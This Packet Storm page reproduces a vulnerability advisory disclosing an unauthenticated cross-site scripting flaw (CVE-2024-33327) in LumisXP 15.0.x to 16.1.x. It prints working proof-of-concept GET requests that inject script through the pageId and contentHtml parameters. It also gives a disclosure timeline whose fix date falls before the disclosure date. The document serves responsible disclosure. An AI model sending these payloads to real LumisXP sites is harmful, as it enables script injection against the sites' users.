what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LumisXP 16.1.x Cross Site Scripting

LumisXP 16.1.x Cross Site Scripting
Posted Jul 11, 2024
Authored by Rodolfo Tavares | Site tempest.com.br

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in UrlAccessibilityEvaluation.jsp.

tags | exploit, xss
advisories | CVE-2024-33327
SHA-256 | 62722fa4e4796c8ac819f4f74bff3b88e4c3207619569dd0af373cca85ccd325

LumisXP 16.1.x Cross Site Scripting

Change Mirror Download
=====[ Tempest Security Intelligence - ADV-6/2024
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References

=====[ Vulnerability
Information]=============================================
* Class: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
('Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting')') [CWE-79]

* CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================
* System affected : LumisXP
* Software Version : Version - v15.0.x to v16.1.x
* Impacts :
* Vulnerability: Lumisxp versions 15.0.x to 16.1.x have an unauthenticated
XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically
in the contentHtml parameter.

=====[ Detailed
description]=================================================
* XSS [GET
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
]:

1 - Send the link by inserting the XSS payload into the contentHtml=
parameter.

```
GET
/lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

```
2 - Verify that in the response your payload will be executed.


=====[ Timeline of
disclosure]===============================================

2/Apr/2024 - Responsible disclosure was initiated with the vendor.
12/Apr/2024 - LumisXP Support confirmed the issue;
16/Fev/2024 - The vendor fixed the vulnerability
29/May/2024 - CVEs was assigned and reserved as CVE-2024-33327

=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [1]
* Rodolfo Tavares
* Niklas Correa

=====[ References ]=====================================================

[1][ [https://cwe.mitre.org/data/definitions/79.html]
[2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]
[3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

--

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter
informações privilegiadas e confidenciais. Todas as informações aqui
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*

*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest’s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close